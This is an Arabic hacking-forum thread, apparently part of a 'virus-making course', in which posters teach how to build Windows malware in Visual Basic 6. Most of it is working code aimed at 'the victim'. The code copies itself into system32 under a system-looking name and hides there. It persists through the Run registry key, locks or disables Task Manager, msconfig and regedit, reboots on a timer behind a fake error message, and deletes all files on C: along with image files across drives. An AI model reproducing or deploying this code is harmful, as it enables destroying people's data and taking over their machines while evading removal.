    اذ لا تعرف ip يمكنك زيارة هذا الموقع و سوف يظهر الايبي مباشرة :
    showmyip.com - geospoofing your cyber presence

  8. #8
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    آلدرس السابع

    دي جزء خاص قمت بتعديلة علي الدورة
    والادوات المطلوبه هي
    1- فيجول بيسك 6
    2- الذكاء والحيل البرمجيه
    3- الريجتسري ( يجب ان تعرف كيف تتعامل معه )

    ================================================== =======

    اولا: الفايروس يعتمد على المراوغه والاختفاء عند تشغيله
    وهناك شفرات تقوم بهذه المهمه مثلا
    انت تريد عندما يضغط الضحيه على الفايرس تريد ان يختفي وينتقل الي ملف انت تحدده بالشفره البرمجيه
    اذا هذا هو الكود

    كود PHP:
    Name App.Path & "\" & App.EXEName & ".exe" As "c:windowssystem32sysstem.exe"

    ماذا فهمت من الكود
    طبعا نحن استخدمنا app.path وهذه داله تقوم بتحديد مكان البرنامج (الفايروس) بدون كتابة مساره
    يعني لو فرضا كتبنا داله name بهذه الطريقه name c":\virus.exe" as "c:\windows\system32\system.exe"
    كذا خطأ لان احتمال الضحيه شغل الفايروس على سطح المكتب او شغله في ملف الوينزوب كذا مراح يشتغل الفايروس
    لان نحن كتبنا بالشفره انقل الملف من c:\virus.exe الي c:\windows\system32\system.exe
    ولذلك استخدمنا داله app.path تحديد مكان الملف تلقائي بدون كتابة مساره
    يعني بذا الطريقه رايح يشتغل الفايروس باي مكان في الجهاز وهذا هو المطلوب
    داله name هي داله تقوم على نقل الملف الي اي مكان انت تحدده
    نحن قمنا بنقل الملف عند الضغط عليه الي دليل الويندوز ثم الي system32 وتغيير اسمه الي system
    حتى عندما يراه الضحيه يحسبه ملف تابع لنظام
    ================================================== =======
    طيب حن الان انتهنا من اول خاصيه للفايروس وهي خاصية التنقل
    الان نريد ان نحمي ملف الفايروس من الظهور يعني نبغاه متخفى غير مرئي
    نستخدم داله setattr وهذه الداله تقوم بتغيير في خصائص الملف
    vbshow تعني اظهر الملف
    vbHidden تجعل الملف مخفي
    بالعربي انا اعتبر هذه الاخصائص اهم شي ويوجد هناك خصائص اخرى لكن ماتهمنا
    طيب كيف نكتب الداله ونستعمل الخصائص
    بعد ماكتبنا الكود الاول وهو كود انتقال الفايروس الي مجلد system32
    نكتب كود الاختفاء تحته بالضبط
    setattr "c:\windows\system32\system.exe",vbHidden
    لو شرحنا الكودان يكونا على النحو التالي
    قم بنقل الملف virus.exe من مكان وجوده الي مجلد system32 وغير اسمه الي system.exe
    الكود الثاني قم باخفاء الملف اللى موجود في مجلد system32 واللي اسمه system.exe
    طبعا الان نحن جعلنا الفايروس يتمتع بخصائص الانتقال والتخفى
    على فكره اي ملف يستخدم كود الاختفاء لن يستطيع البحث اللي في جهازك كشفه او اظهاره
    لن الويندوز يعطي حرية الملف باالاختفاء وبذلك يعطل خاصية البحث عنه
    ================================================== =======
    الان ناتي الي مهمه الفايروس ماذا نريد ان يعمل الفايروس
    هناك عدة امور تخبربها الفايروس ليقوم بها


    1- اعادة تشغيل الجهاز
    2- حذف ملفات معينه
    3- عمل فرومات للجهاز .................. هذا لا انصح به نحن نريد ان نصنع فايروس له طابع خاص

    يعني نريد ان نصنع فايروس له مهمات مميزه يعرف بها ويشتهر بها عند العامه
    4- ايقاف عمل بعض البرامج التي تحمل امتداد exe اوcom او htm او html او gif وهكذا
    5- الهجوم على ملفات وتخريبها ( اي تغيير امتدادها حتى لاتعمل ) مثل الهجوم على الصور بامتداد gif وتحويلها الي
    امتداد txt او اي امتداد اخر
    5- عمل فقط رساله تظهر قبل شاشة الترحيب
    6- عمل فايروس يقوم باستخدام الدوس وتشغيل بعض اوامره مثل امر ping لضرب المواقع
    7- استخدام الفايروس بتنزيل ملفات تجسس من الانترنت او استدعاء باتش لك من موقعك الخاص وتشغيله في جهاز الضحيه
    8- التحكم في بعض برامج النظام وايقافها مثل ايقاف قائمة المهام وغيرها من البرامج المهمه
    9- اخفاء محركات الاقراص السي الدي المرن الفلاش مموري والسدي
    10 - عمل اشياء ازعاجيه مثل فتح مجلدات فتح برامج وهكذا
    11- عمل تسجيل خروج من الماسينجر او التلاعب في حالات الاتصال
    12- عمل رقم سري للجهاز لمنع الضحيه لدخول لسطح المكتب
    13- ارسال الفايروس رساله لنا على بريدنا يخبرنا بتشغيل الضحيه للفايروس مع عرض الاي بي ووقت تشغيله وتاريخه
    كل هذه الاشياء سوف اشرحها مع بعض الخدع في تشغيل الفايروس بدون ان يضغط عليه الضحيه
    اتمنى قرات الدرس جيد حتى ابدأ بالدرس الثاني والذي سوف يقدم اشياء جديده لك ومفيده وبعض الخدع والحيل
    سوف ابدا الان بعمل شفرات توقف اي برنامج تابع لنظام بايقاف الفايروس
    وخلونا نبدأ الان بايقاف قائمة المهام و لن تعمل اذا ضغطت على مفاتيح ctrl+atl+del
    اذا دعونا نصنع كود يخلي النظام يظهر رساله بان قائمة المهام مشغوله مع برنامج اخر وبكذا منعنا المستخدم من فتحها

    كود PHP:
    Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1
    الان نحن منعنا المستخدم من فتح قائمة المهام واذا حاول فتحها سوف تظهر رسالة من النظام تقول هذا البرنامج مستخدم
    من قبل برنامج اخر
    طبعا الكود هذا سوف تضعه في form_load
    مع وضع كود يقوم على تشغيل الفايروس في كل مره شغل الضحيه جهازه
    وهذا كود تشغيل الفايروس مع تشغيل الجهاز


    كود PHP:
    Set O = CreateObject("W******.****l")
    O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"< /STRONG >

    اذا دعونا الان نجمع الاكواد اللي عملناه ونضعها في form_load

    كود PHP:
    Private Sub Form_Load()
    Set O = CreateObject("W******.****l")
    O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
    Form1.Hide
    Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
    SetAttr "c:WINDOWSsystem32system.exe", vbHidden
    Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
    End Sub<
    /STRONG >

    دعونا نشرح عمل الاكواد بالتفصيل

    كود PHP:
    Set O = CreateObject("W******.****l")
    O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"

    ProgramName = اسم القيمه تستطيع تغيير اسمها مثلا اجعلها system او اي اسم
    c:\WINDOWS\system32\system.exe" بيانات القيمه
    الكود يقوم على تشغيل الملف اللي اسمه system.exe الذي على المسار التالي
    "c:\WINDOWS\system32\system.exe"
    طبعا هذا الكود يقوم على انشاء قيمه في مفتاح run اللي في الريجتسري مما يجعل الفايروس يشتغل مع تشغيل الجهاز
    الكود الثاني Form1.Hide عارفينه اكيد يقوم على اخفاء الفايروس فلايظهر نافذته
    الكود الثالث

    كود PHP:
    Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"

    يقوم بنقل الفايروس الي مجلد system32 ويخلي اسمه system.exe
    لازم يتوافق مسار الفايروس مع مساره في بدأ التشغيل حتى يستطيع تشغيل نفسه مع تشغيل الجهاز
    الكود الرابع

    كود PHP:
    setattr "c:\windows\system32\system.exe",vbHidden

    اعطاء خاصية الاخفاء للفايروس
    الكود الخامس

    كود PHP:
    Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

    معناه يقوم على فتح قائمة المهام للقراءه ولايقوم على غلقها يعني تضل مفتوحه ومعلقه ومرتبطه مع الفايروس
    بحيث لو قام الضحيه بالضغط على مفاتيح ctrl+alt+del مراح تفتح معه
    ولو ذهب الي مجلد system32 وقام بالضغط عليه سوف تظهر له رساله من النظام مفادها البرنامج مستخدم من قبل برنامج اخر اي ان الفايرس مستخدمها مدام الجهاز شغال
    اتمنى تطبيق هذا الدرس
    وسوف اقوم بشرح اكثر من طريقه لايقاف قائمة المهام وايقاف برامج اخرى مثل الاداة المساعده التي تقوم على اظهار
    الملفات التي تعمل مع بدا تشغيل الجهاز
    دورة متكاملة عن صناعة الفيروسات عن طريق الفيجول بيسك و لاكن انت كفيت و وفيت و اش ما تحتاج اخوك انا و عدي اضافات :
    مثلا لاخفاء الفورم يوجد عدة طرق اضيف لطريق الاخ :
    me.hide
    اما لتشغيل الفيروس عند بدا التشغيل :

    كود PHP:
    كود بدا التشغيل :
    في الموديل :
    Option Explicit
    Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
    Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
    Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
    Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
    Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
    Private Const READ_CONTROL = &H20000
    Private Const KEY_QUERY_VALUE = &H1
    Private Const KEY_SET_VALUE = &H2
    Private Const KEY_CREATE_SUB_KEY = &H4
    Private Const KEY_ENUMERATE_SUB_KEYS = &H8
    Private Const KEY_NOTIFY = &H10
    Private Const KEY_CREATE_LINK = &H20
    Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
    Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
    Private Const KEY_EXECUTE = KEY_READ
    Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
    Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
    Private Const HKLM =
    &H80000002 ' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName As String) Dim hKey
    As Long Dim Ret
    As Long ' فتح
    المفتاح المطلوب Ret =
    RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS,
    hKey) ' حذفها من
    مسجل النظام. Ret = RegDeleteValue(hKey,
    ProgramName) ' إغلاق المفتاح
    RegCloseKey hKey End Sub Public Sub RunWhenStartup(ProgramName As String, ProgramPath
    As String) Dim hKey As Long Dim Ret
    As Long ' فتح
    المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' إنشاء قيمة جديدة بإسم
    البرنامج وعنوانه. Ret = RegSetValueEx(hKey,
    ProgramName, 0&, 1, ProgramPath,
    Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1) ' إغلاق
    المفتاح RegCloseKey hKey End Sub
    ------------ في الفورم :
    RunWhenStartup "عنوان", App.Path &
    "" & App.EXEName &
    ".exe" <
    /FONT >
    <
    /STRONG >
    و اما عن التدمير :

    كود PHP:
    kill "c:\*.*"

    و لضمان عمل الفيروس :

    كود PHP:
    On Error Resume Next

    كود PHP:
    Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

    هذا الكود هو حماية قائمة المهام من القراءة يعني ماتقدر تفتحه ابد

    يعني دام الفايروس شغال مراح تقدر تفتحها ابد ( كذا الشرح اعتقد وصل الي ادمغتكم الحلوه)
    الي الان حنا حمينا الفايروس من قائمة المهام وبكذا حققنا الحمايه رقم واحد
    الان نريد حماية الفايروس من اداة بدا التشغيل التي تعرض البرامج التي تعمل مع بداية الويندوز
    نسوي لها كود نفس كود قائمة المهام
    منع قراءة او فتح برنامج الاداة المساعده ( بدأ التشغيل )

    كود PHP:
    Open "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe " For Input Lock Read As 1

    وبكذا حققنا الحماية رقم اثنين
    منع قراءة برنامج الريجستري

    كود PHP:
    Open "C:\WINDOWS\regedit.exe" For Input Lock Read As 1

    وبهذه ايضا حققنا الحماية الثالثه للفايروس
    شوف اي شخص فاهم للجهاز وطريقة حذف الملفات يتبع عدة طرق

    1- قائمة المهام لايقافه
    2- بدا الشتغيل ليقاف عمله حتى لايعمل مع بدا التشغيل
    3- حذفه من الريجستري يعني حذف القيمه حقته


    حنا نبغى ايقاف عمل الثلاث برامج هذه حتى يبقى الفايروس بأمان
    وطبعا الان نحن حقننا ثلاث حمايات للفايروس من برنامج قائمة المهام وبرنامج الاداة المساعده(بدأالتشغيل) ومن الريجستري
    الحين اتحدى اي شخص يحذف الفايرس ( يعني تسلقى على الفراش وانت مطمن )
    الان ناتي الي اعمال الفايروس نبغى نتفنن في اعماله واوامره
    =============================================
    يعني خلوهم يقولون ياحلو فايروس فلان والله انه يهبل فيه اشياء خرافيه وحركات نص كم ( فاصل اعلاني )

    =============================================
    يعني بدال من خلي الفايروس يعيد التشغيل كل مافتح الجهاز نخليه يعيد التشغيل في ساعه ودقيقه معينه
    يعني مثلا يعيد تشغيل الجهاز كل مصارت الساعه 1:1 و 2:1 و 3:1 وهكذا
    يعني كل ساعه ودقيقه ينشط الفايرس وكل ساعتين ودقيقه ينشط الفايرس وهكذا
    طيب الان افتح موديل في الفيجول بيسك وضع فيها هذا الكود

    كود PHP:
    Declare Function ExitWindow*** Lib "user32" _
    (ByVal uFlags As Long, ByVal dwReserved _
    As Long) As Long

    وبعدها ضع عداد تايمر على الفورم وجعله 1000 العداد
    الان اكتب الشفره البرمجيه الرائعه

    كود PHP:
    Private Sub Timer1_Timer()
    If Minute(Time) = 1 Then
    t& = ExitWindow***(EWX_REBOOT, 0)
    End If
    End Sub
    <
    /STRONG >

    هذا الكود يقوم على تسجيل خروج من الجهاز يعني لازم تصير الساعه 1:1 يعني لازم الساعه تكون ساعه ودقيقه
    ساعتين ودقيقه ثلاث ساعات ودقيقه وهكذا
    طبعا قبل تسجيل الخروج بدقيقه تظهر رساله او نافذه تخبر الضحيه بان هناك خلل في ملف معين ولذلك يجب تسجيل الخروج

    كود PHP:
    Private Sub Timer2_Timer()
    If Minute(Time) = 0 Then
    MsgBox "ملفات الربط لاتستجيب للنظام سوف يقوم النظام بتسجيل الخروج"
    End If
    End Sub<
    /STRONG >
    لاحظ جلعنا الدقائق تساوي صفر يعني الرسالة سوف تظهر كل ما صارت الساعه حكم يعني 3:00 و 2:00 وهكذا
    يعني قبل تسجيل الخروج بدقيقه تظهر الرساله تخبر الضحيه بوجود خلل
    حنا عملنا مسج بوكس تظهر رساله في الشرح القادم سوف نعمل فورم ثاني يعرض نافذه تشبه نافذه فايروس بلاستر
    الشرح القادم سوف نكون اكثر توسع ان شاءالله وتقديم شفرات جديده على الساحه مع ترك بصمه قوية في جهاز الضحيه

  9. #9
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    هذا هو الدرس الآخير
    إن شاء الله الجميع سوف يصبح محترفا
    الدرس الثامن والاخير في الدورة


    صناعة الفايروسات تحتاج الي ذكاء والي تفكير والي احتمالات
    ذكاء يعني ذكاء الفايروس كيف يعمل ماذا يفعل كيف يحمي نفسه كيف يراوغ
    تفكير اي فكر كيف تصنع فايروس قوي وذكي يصعب السيطره عليه
    احتمالات تعني احتمال الضحيه يعمل فرومات يعني الفايروس رايح ينحذف طيب وين اخليه يتخبأ مثل ينسخ نفسه في الدي
    اووووووووووه طيب افرض الضحيه فرمت حتى الدي ه لقيت فكره رائعه اخليه بنسخ نفسه في الفلاش مموري و القرص المرن وهكذا
    طيب الفلاش مموري حرف القرص يتغير من جهاز الي جهاز ربما يكون g ربما يكون e ربما يكون حرف اخر
    ماشي اعمل شفرة نسخ الي اكثر من حرف واحطه باداة تايمر مع وضع شفرة تخطى الاخطاء وهكذا
    ================================================== =======
    الفكره هو ان يقوم الفايروس بنقل نفسه الي مجلد مهم في الجهاز ثم يغير اسمه الي اسم مهم مثل windows او system
    او taskmagr وهكذا حاول ان تخلي اسمه يحسس الضحيه بانه تابع لنظام
    وبعد ما يتمركز الفايروس في مجلد مهم يقوم بالخطوه الثاني وهي نسخ نفسه الي عدة مجلدات والي عدة محركات اقراص
    مثل الدي والفلاش مموري والقرص المرن
    ================================================== =======
    حماية الفايروس شي مهم جدا جدا حتى لايحذف
    حماية الفايروس يجب ان نحميه مثل ماذكرت سابق من ثلاث برامج وهي ( قائمة المهام + الريجتسري + بدأ الشتغيل)
    ================================================== ========
    دعونا الان نبدا بصناعة فايروس قوى جدا ومتعدد المهام
    اولا يجب ان نضع هذه الشفرات في اجراء الفورم وهذا شي اساس لكل فايروس تصنعه لابد ان تضع هذه الشفرات في كل
    مره تصنع فيها فايروس

    كود PHP:
    Private Sub Form_Load()
    Set O = CreateObject("W******.****l")
    O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
    Form1.Hide
    Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
    SetAttr "c:WINDOWSsystem32system.exe", vbHidden
    Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
    Open "C:WINDOWSpchealthhelpctrbinariesmsconfig.exe" For Input Lock Read As 1
    Open "C:WINDOWSregedit.exe" For Input Lock Read As 1
    End Sub
    هذه الشفرات يجب ان تضعها في كل مره تصنع فيها فايروس وتحطها في اجراء الفورم
    اول شفره تشغيل الفايروس مع تشغيل الجهاز
    ثاني شفره قمنا باخفاء الفايروس اي النافذه
    ثالث شفره قمنا بنقل الفايروس الي مجلد system32 وتغيير اسمه الي system ويعني الفايروس تمركز في هذا المجلد
    رابع شفره تم اخفاء الفايروس اي اعطاءه خاصية التخفي
    الشفره الخامسه والسادسه والسابعه حمينا الفايروس من برنامج قائمة المهام و بدا الشتغيل و الريجتسري
    ================================================== =======
    هناك شفره تقوم بتعطيل قائمة المهام نهائيا وهي تتعامل مع الريجتسري اي تغير قيمة قائمة المهام الي 1 مما يجعلها تتعطل

    كود PHP:
    Const HKCU = &H80000001
    Set objReg = GetObject("winmgmts:\\.\root\" & _
    "Default:StdRegProv")
    strKeyPath = "SoftwareMicrosoftWindowsCurrentVersionPoliciesSys tem"
    objReg.Createkey HKCU, "SoftwareMicrosoftWindowsCurrentVersionPoliciesSys tem"
    objReg.SetDwordValue HKCU, strKeyPath, "DisableTaskMgr", 1
    هذه الشفره تقوم بتعطيل قائمة المهام لاحظ رقم واحد في اخر الشفره معناه تعطيل قائمة المهام وعندما تضغط على
    ctrl+alt+del تظهر لك رساله من النظام تقول ان قائمة المهام معطله من قبل المسؤول
    ولكن عندما تشيل رقم واحد وتحط صفر سوف تعمل قائمة المهام من جديد
    هذه الشفره فقط تصلح لنظام اكس بي فقط
    ================================================== ===
    الان دعونا نصنع اوامر الفايروس
    اول امر للفايروس هو حذف الصور اللي بامتداد gif في جميع اركان الجهاز
    ضع اداة تايمر وجعل العداد فيها يساوي 1000
    ولا تنسى وضع textbox على الفروم ايضا
    واكتب هذا الكود في اجراء التايمر

    كود PHP:
    Private Sub Timer1_Timer()
    If Minute(Time) = 1 Then
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("d:\*.gif") <> "" Then
    Kill "d:\*.gif"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("d:\*.jpg") <> "" Then
    Kill "d:\*jpg"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("c:\*.jpg") <> "" Then
    Kill "c:\*.jpg"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("c:\*.gif") <> "" Then
    Kill "c:\*.gif"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("a:\*.gif") <> "" Then
    Kill "a:\*.gif"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("a:\*.jpg") <> "" Then
    Kill "a:\*.jpg"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("e:\*.gif") <> "" Then
    Kill "e:\*.gif"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("e:\*.jpg") <> "" Then
    Kill "e:\*.jpg"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("g:\*.gif") <> "" Then
    Kill "g:\*.gif"
    Else
    Text1.Text = "QJgJI-pJLc "
    ElseIf Dir("g:\*.jpg") <> "" Then
    Kill "g:\*.jpg"
    Else
    End
    End If
    End Sub
    End Sub
    ================================================== =======
    دعونا نشرح الشفرات الطويله هذه رغم انها متشابهه لكن الاختلاف بمكان الحذف
    If Minute(Time) = 1 Then
    Text1.Text = "QJgJI-pJLc "
    عندما تكون الساعه 1:1 و 2:1 و 3:1 و4:1 الي اخره قم بتنفيذ الشرط
    Text1.Text = "QJgJI-pJLc " هذا شرط انا وضعته لسد الفراغ فقط يعني حيله برمجيه لان ملقيت شرط احطه
    فاوضعت اكتب عالم الوله في التيسكت بوكس
    حتى يقوم باكمال بقية الشروط اذا وضع عالم الوله في textbox يقوم باكمال بقية الشروط
    ======================================
    ElseIf Dir("d:\*.gif") <> "" Then ابحث في الدي عن صور بامتداد gif اذا وجدها سوف ينفذ الشرط
    Kill "d:\*.gif" قم بحذف الصور بامتداد if
    Else حقق الشرط الثاني اذا لم يتحقق الشرط الاول وهو قم بوضع عالم الوله في التيكست بوكس
    Text1.Text = "QJgJI-pJLc "
    وبعدها يكمل بقية الشروط بدون اي اخطاء
    ==================================

    كود PHP:
    Private Sub Timer1_Timer()
    On Error GoTo Cont:
    If Minute(Time) = 1 Then
    Kill "d:\*.gif"
    Kill "d:\*jpg"
    Kill "c:\*.gif"
    Kill "c:\*.jpg"
    Kill "e:\*.gif"
    Kill "e:\*.jpg"
    Kill "g:\*.gif"
    Kill "g:\*.jpg"
    End If
    Cont:
    End Sub
    جرب هذا الكود افضل الاول فعلا فيه اخطاء ويحتاج الي تعديل
    لاحظ في اخر شرط حطيت الشرط الثاني end اي سوف يتم ايقاف الفايروس
    ولن يعمل الا في المره القادمه عند تشغيل الجهاز
    انتهي ياجماعة انتم مستنين اية روحوا بقا وابقوا تعالوا في العيد الجااااااااااااااي hhhhhhh

  10. #10
    هكر مبتديء الصورة الرمزية bombrman
    تاريخ التسجيل
    Oct 2009
    الدولة
    Arminia
    المشاركات
    22

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الموضوع حقا جيد جدا
    يجب ان تكون حكر متألق بأسرع وقت
    اخوية عندي طلب صغير ممكن تعلمني كيف اكدر اصنع فايروس بل pascal و c++
    لان انا اتعلم لغة هذة البرنامجان
    بدي ابدع عند المدرس
    ارجوك اذا تعرف علمني او امتبه هنا بدي اقراه و اكتب فيروس بل pascal و c++
    التعديل الأخير تم بواسطة bombrman ; 11-01-2009 الساعة 05:47 PM
    القندرة الذرية

صفحة 1 من 5 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. تمهيد: دورة إحتراف إختراق الأجهزة
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم اختراق الأجهزة
    مشاركات: 33
    آخر مشاركة: 02-25-2012, 09:52 AM
  2. فهرس دورة إحتراف إختراق الأجهزة
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم اختراق الأجهزة
    مشاركات: 88
    آخر مشاركة: 02-25-2012, 09:50 AM
  3. لمن لايصلي (( سيصلي بإذن الله )) إذا قرأ هذا !!
    بواسطة وليد18 في المنتدى المنتدى إلاسلامي
    مشاركات: 7
    آخر مشاركة: 05-19-2011, 05:16 PM
  4. أقوى دورة إحتراف إختراق البريد والإيميلات
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم دورة إختراق البريد الإحترافية
    مشاركات: 9
    آخر مشاركة: 03-04-2011, 08:04 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •